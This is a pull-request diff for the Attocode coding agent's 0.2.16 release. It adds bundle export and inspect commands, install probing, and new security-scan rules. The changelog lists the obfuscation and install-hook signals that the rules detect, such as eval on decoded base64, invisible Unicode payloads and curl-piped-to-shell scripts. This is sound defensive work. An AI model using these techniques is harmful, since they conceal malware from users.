Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 22 additions & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,28 @@ All notable changes to the Attocode Python agent will be documented in this file
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [Unreleased]

## [0.2.16] - 2026-04-05

### Added

#### Code-Intel Install Validation & Bundles
- `attocode code-intel probe-install <target>` — runtime MCP probing for installed file-based assistant configs; resolves `${workspaceFolder}` placeholders, supports local/user scopes, and optionally exercises `project_summary` when the install config pins a project path
- `ResolvedInstallSpec` in `installer.py` plus `resolve_install_spec()` helpers — normalizes installed MCP target configs across JSON/TOML/YAML-backed assistants so install status and probe flows share one source of truth
- `attocode code-intel bundle export` / `bundle inspect` — export portable local code-intel bundles and inspect bundle metadata, artifact presence, sizes, and SHA-256 hashes
- Bundle metadata now records schema version, creation timestamp, project name, bundled artifact inventory, and the shipping `attocode` version for release/debugging workflows

#### GlassWorm-Class Supply-Chain Detection
- 7 new anti-pattern rules in `security_scan` targeting stealth supply-chain malware (NPM/VS Code marketplace attacks):
- `invisible_unicode_run` (HIGH, CWE-506) — detects runs of zero-width / variation-selector / tag-character steganographic payloads; scans comment lines since that is a common hiding spot
- `js_eval_on_decoded`, `js_eval_on_buffer`, `js_eval_on_fromcharcode` (CRITICAL, CWE-94) — compound obfuscation patterns where JavaScript runs dynamic code on `atob`/`Buffer.from(..., 'base64')`/`String.fromCharCode` output
- `python_eval_on_b64decode`, `python_exec_on_codecs_decode`, `python_exec_on_marshal_loads` (CRITICAL, CWE-94) — Python equivalents covering base64 decode, codecs/zlib/bytes.fromhex, and marshal.loads
- Additional JavaScript obfuscation heuristics: `js_dynamic_require_concat` for Shai-Hulud-style dynamic `require()` string assembly and `js_settimer_string_arg` for string-based `setTimeout`/`setInterval` execution
- `scan_comments` field on `SecurityPattern` dataclass — allows individual patterns to opt into scanning comment lines (previously all comments were globally skipped)
- Install-hook scanner in `DependencyAuditor._audit_install_hooks` — flags `package.json` `preinstall`/`install`/`postinstall` scripts containing obfuscation or remote-fetch indicators (curl-piped-to-shell, remote scripts, inline `node -e`, `child_process` require, eval/atob/base64)
- Shared `iter_pattern_matches` generator in new `src/attocode/integrations/security/matcher.py` — consolidates comment-skip, language-filter, and per-pattern iteration logic used by both the filesystem scanner and the DB-backed scanner

## [0.2.15] - 2026-04-04

### Added
Expand Down
2 changes: 1 addition & 1 deletion docs/ast-and-code-intelligence.md
Original file line number Diff line number Diff line change
Expand Up @@ -421,7 +421,7 @@ The MCP server exposes 27 tools across 6 categories:
| Tool | Parameters | Description |
|------|-----------|-------------|
| `semantic_search` | `query`, `top_k`, `file_filter` | Natural language code search (vector + keyword RRF) |
| `security_scan` | `mode`, `path` | Secret detection, anti-patterns, dependency issues |
| `security_scan` | `mode`, `path` | Secret detection, anti-patterns (incl. supply-chain obfuscation), dependency & install-hook issues |

#### LSP

Expand Down
8 changes: 8 additions & 0 deletions docs/roadmap.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,13 @@
# Attocode Roadmap

## v0.2.16 -- Install Probing, Portable Bundles & Supply-Chain Hardening (Released 2026-04-05)

1. ~~**Installed-target runtime probing**~~ -- DONE: `attocode code-intel probe-install` validates file-based MCP installs by launching the configured stdio command, resolving `${workspaceFolder}`, and optionally exercising `project_summary`
2. ~~**Portable code-intel bundles**~~ -- DONE: `attocode code-intel bundle export` / `bundle inspect` package local artifacts with metadata, hashes, and version stamping for offline transfer and debugging
3. ~~**Shared install config resolution**~~ -- DONE: `ResolvedInstallSpec` and `resolve_install_spec()` unify JSON/TOML/YAML-backed assistant config parsing for install, status, and probe flows
4. ~~**Supply-chain malware detection expansion**~~ -- DONE: new `security_scan` anti-patterns for invisible Unicode payloads, eval-on-decoded-data obfuscation, dynamic `require()` assembly, and string-based timer execution
5. ~~**Install-hook auditing**~~ -- DONE: dependency audit now flags suspicious `preinstall`/`install`/`postinstall` scripts and shares matcher behavior between local and DB-backed scanners

## v0.2.6 -- Language Support, Search Quality & Architecture (Released 2026-03-24)

1. ~~**Language-specific symbol extraction**~~ -- DONE: 11 new tree-sitter configs (Erlang, Clojure, Perl, Crystal, Dart, OCaml, F#, Julia, Nim, R, Objective-C); total 36 languages supported
Expand Down
4 changes: 2 additions & 2 deletions pyproject.toml
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ build-backend = "hatchling.build"

[project]
name = "attocode"
version = "0.2.15"
version = "0.2.16"
description = "Production AI coding agent"
readme = "README.md"
requires-python = ">=3.12"
Expand Down Expand Up @@ -201,7 +201,7 @@ exclude_lines = [
]

[tool.bumpversion]
current_version = "0.2.15"
current_version = "0.2.16"
commit = false
tag = false

Expand Down
2 changes: 1 addition & 1 deletion src/attocode/__init__.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,3 @@
"""Attocode - Production AI coding agent."""

__version__ = "0.2.15"
__version__ = "0.2.16"
2 changes: 1 addition & 1 deletion src/attocode/code_intel/GUIDELINES.md
Original file line number Diff line number Diff line change
Expand Up @@ -59,7 +59,7 @@
| Tool | Purpose | When to Use |
|------|---------|-------------|
| `semantic_search` | Natural language code search. Optional `mode`: "auto" (default), "keyword" (fast), "vector" (wait for embeddings) | Find code by description, not name |
| `security_scan` | Secret detection, anti-patterns, dependency issues | Security review |
| `security_scan` | Secret detection (13 patterns), anti-patterns (21 rules incl. supply-chain obfuscation: invisible Unicode, eval-on-decoded-data, install-hook scrutiny), dependency issues | Security review, supply-chain hardening |

### Memory & Recall (50–500 tokens each)

Expand Down
88 changes: 88 additions & 0 deletions src/attocode/code_intel/bundle.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,88 @@
"""Portable local artifact bundles for code-intel state."""

from __future__ import annotations

import hashlib
import json
import tarfile
from datetime import UTC, datetime
from pathlib import Path
from tempfile import TemporaryDirectory

from attocode import __version__

_SCHEMA_VERSION = 1
_ARTIFACTS = (
("artifacts/index/symbols.db", ".attocode/index/symbols.db"),
("artifacts/vectors/embeddings.db", ".attocode/vectors/embeddings.db"),
("artifacts/cache/memory.db", ".attocode/cache/memory.db"),
("artifacts/adrs.db", ".attocode/adrs.db"),
)


def _sha256(path: Path) -> str:
digest = hashlib.sha256()
with path.open("rb") as fh:
for chunk in iter(lambda: fh.read(65536), b""):
digest.update(chunk)
return digest.hexdigest()


def _metadata(project_dir: Path) -> dict[str, object]:
artifacts: list[dict[str, object]] = []
for bundle_path, rel_path in _ARTIFACTS:
source = project_dir / rel_path
present = source.exists()
artifacts.append({
"path": bundle_path,
"present": present,
"size_bytes": source.stat().st_size if present else 0,
"sha256": _sha256(source) if present else None,
})

return {
"schema_version": _SCHEMA_VERSION,
"created_at": datetime.now(UTC).isoformat().replace("+00:00", "Z"),
"project_name": project_dir.name,
"project_root_basename": project_dir.name,
"attocode_version": __version__,
"artifacts": artifacts,
}


def export_bundle(project_dir: str, output_path: str) -> Path:
"""Export local code-intel artifacts into a tar.gz bundle."""
project_root = Path(project_dir).resolve()
destination = Path(output_path).resolve()
destination.parent.mkdir(parents=True, exist_ok=True)
metadata = _metadata(project_root)

with TemporaryDirectory(prefix="attocode-bundle-") as tmpdir:
root = Path(tmpdir) / "attocode-bundle"
root.mkdir(parents=True, exist_ok=True)
metadata_path = root / "metadata.json"
metadata_path.write_text(json.dumps(metadata, indent=2) + "\n", encoding="utf-8")

for bundle_path, rel_path in _ARTIFACTS:
source = project_root / rel_path
if not source.exists():
continue
target = root / bundle_path
target.parent.mkdir(parents=True, exist_ok=True)
target.write_bytes(source.read_bytes())

with tarfile.open(destination, "w:gz") as archive:
archive.add(root, arcname="attocode-bundle")

return destination


def inspect_bundle(bundle_path: str) -> dict[str, object]:
"""Read bundle metadata without touching local project state."""
bundle = Path(bundle_path).resolve()
with tarfile.open(bundle, "r:gz") as archive:
metadata_member = archive.getmember("attocode-bundle/metadata.json")
fh = archive.extractfile(metadata_member)
if fh is None:
raise FileNotFoundError("metadata.json missing from bundle")
return json.loads(fh.read().decode("utf-8"))
116 changes: 116 additions & 0 deletions src/attocode/code_intel/cli.py
Original file line number Diff line number Diff line change
Expand Up @@ -41,6 +41,8 @@ def dispatch_code_intel(parts: tuple[str, ...] | list[str], *, debug: bool = Fal
_cmd_serve(args[1:], debug=debug)
elif cmd == "status":
_cmd_status()
elif cmd == "probe-install":
_cmd_probe_install(args[1:])
elif cmd == "notify":
_cmd_notify(args[1:])
elif cmd == "index":
Expand Down Expand Up @@ -69,6 +71,8 @@ def dispatch_code_intel(parts: tuple[str, ...] | list[str], *, debug: bool = Fal
_cmd_verify(args[1:])
elif cmd == "reindex":
_cmd_reindex(args[1:])
elif cmd == "bundle":
_cmd_bundle(args[1:])
else:
print(f"Unknown code-intel command: {cmd}", file=sys.stderr)
_print_help()
Expand All @@ -86,6 +90,7 @@ def _print_help() -> None:
" serve Run MCP server directly (stdio or SSE)\n"
" index Build or check embedding index for semantic search\n"
" status Check installation status across all targets\n"
" probe-install Run a runtime MCP probe for an installed target\n"
" notify Notify server about changed files (for hooks)\n"
" test-connection Verify connectivity to the remote server\n"
" watch Watch filesystem for changes and notify remote server\n"
Expand All @@ -99,6 +104,8 @@ def _print_help() -> None:
" deps <file> Show file dependencies and dependents\n"
"\n"
"Maintenance commands:\n"
" bundle export Export local code-intel artifacts into a bundle\n"
" bundle inspect Inspect bundle metadata and artifacts\n"
" gc Run garbage collection (orphaned embeddings + content)\n"
" verify Run integrity checks on the index\n"
" reindex Force a full reindex of the project\n"
Expand Down Expand Up @@ -134,6 +141,11 @@ def _print_help() -> None:
" --global Install globally (Claude, Codex, Zed, Gemini, Junie, Amp)\n"
" --hooks Also install PostToolUse hooks (Claude Code)\n"
"\n"
"Probe options:\n"
" probe-install <t> Probe an installed file-based target by launching MCP stdio\n"
" --project <path> Project directory to substitute for ${workspaceFolder}\n"
" --global Read the user/global config when the target supports it\n"
"\n"
"Serve options:\n"
" --transport <type> Transport protocol: stdio (default), sse, or http\n"
" --host <addr> Server host address (default: 127.0.0.1)\n"
Expand Down Expand Up @@ -167,6 +179,10 @@ def _print_help() -> None:
" --top <N> Number of results (query: default 10, hotspots: default 15)\n"
" --filter <glob> File filter glob for semantic search (e.g. '*.py')\n"
" --search <name> Search for symbol by name (symbols command)\n"
"\n"
"Bundle options:\n"
" bundle export --output <bundle.tar.gz> [--project <path>]\n"
" bundle inspect <bundle.tar.gz>\n"
)


Expand Down Expand Up @@ -205,6 +221,10 @@ def _parse_opts(args: list[str]) -> tuple[str | None, str, str, bool]:
return target, project_dir, scope, hooks


def _args_include_project_flag(args: list[str]) -> bool:
return any(arg == "--project" or arg.startswith("--project=") for arg in args)


def _cmd_install(args: list[str]) -> None:
from attocode.code_intel.installer import ALL_TARGETS_STR, install, install_hooks

Expand Down Expand Up @@ -507,6 +527,102 @@ def _cmd_status() -> None:
print(f" Entry point: {resolved}")


def _cmd_probe_install(args: list[str]) -> None:
"""Run a runtime MCP probe for a file-based installed target."""
from attocode.code_intel.installer import ALL_TARGETS_STR
from attocode.code_intel.probe import probe_install

target, project_dir, scope, _hooks = _parse_opts(args)
if not target:
print(f"Error: specify a target ({ALL_TARGETS_STR})", file=sys.stderr)
sys.exit(1)

exit_code = probe_install(
target,
project_dir=project_dir,
scope=scope,
force_project_probe=_args_include_project_flag(args),
)
if exit_code:
sys.exit(exit_code)


def _cmd_bundle(args: list[str]) -> None:
"""Export or inspect local code-intel bundles."""
if not args or args[0] in {"-h", "--help", "help"}:
print(
"Usage:\n"
" attocode code-intel bundle export [--project <path>] [--output <bundle.tar.gz>]\n"
" attocode code-intel bundle inspect <bundle.tar.gz>\n"
)
return

subcmd = args[0]
if subcmd == "export":
from attocode.code_intel.bundle import export_bundle

_, project_dir, _, _ = _parse_opts(args[1:])
output_path = ""
tail = args[1:]
i = 0
while i < len(tail):
arg = tail[i]
if arg == "--output" and i + 1 < len(tail):
output_path = tail[i + 1]
i += 2
elif arg.startswith("--output="):
output_path = arg.split("=", 1)[1]
i += 1
else:
i += 1

if not output_path:
bundle_name = f"attocode-bundle-{os.path.basename(os.path.abspath(project_dir))}.tar.gz"
output_path = os.path.join(os.getcwd(), bundle_name)

destination = export_bundle(project_dir, output_path)
print(f"Bundle exported to {destination}")
return

if subcmd == "inspect":
import json as json_mod
import tarfile

from attocode.code_intel.bundle import inspect_bundle

bundle_path = ""
for arg in args[1:]:
if not arg.startswith("-"):
bundle_path = arg
break
if not bundle_path:
print("Error: specify a bundle path.", file=sys.stderr)
sys.exit(1)

try:
metadata = inspect_bundle(bundle_path)
except (FileNotFoundError, OSError, tarfile.TarError, KeyError, json_mod.JSONDecodeError) as exc:
print(f"Error: could not inspect bundle: {exc}", file=sys.stderr)
sys.exit(1)
print(f"Bundle: {os.path.abspath(bundle_path)}")
print(f" Schema version: {metadata.get('schema_version')}")
print(f" Created at: {metadata.get('created_at')}")
print(f" Project: {metadata.get('project_name')}")
print(f" Attocode version: {metadata.get('attocode_version')}")
print(" Artifacts:")
for artifact in metadata.get("artifacts", []):
status = "present" if artifact.get("present") else "missing"
print(
" "
f"{artifact.get('path')}: {status}, "
f"size={artifact.get('size_bytes')}, sha256={artifact.get('sha256')}"
)
return

print(f"Error: unknown bundle command '{subcmd}'", file=sys.stderr)
sys.exit(1)


def _cmd_notify(args: list[str]) -> None:
"""Notify the server about changed files via the notification queue.

Expand Down
Loading
Loading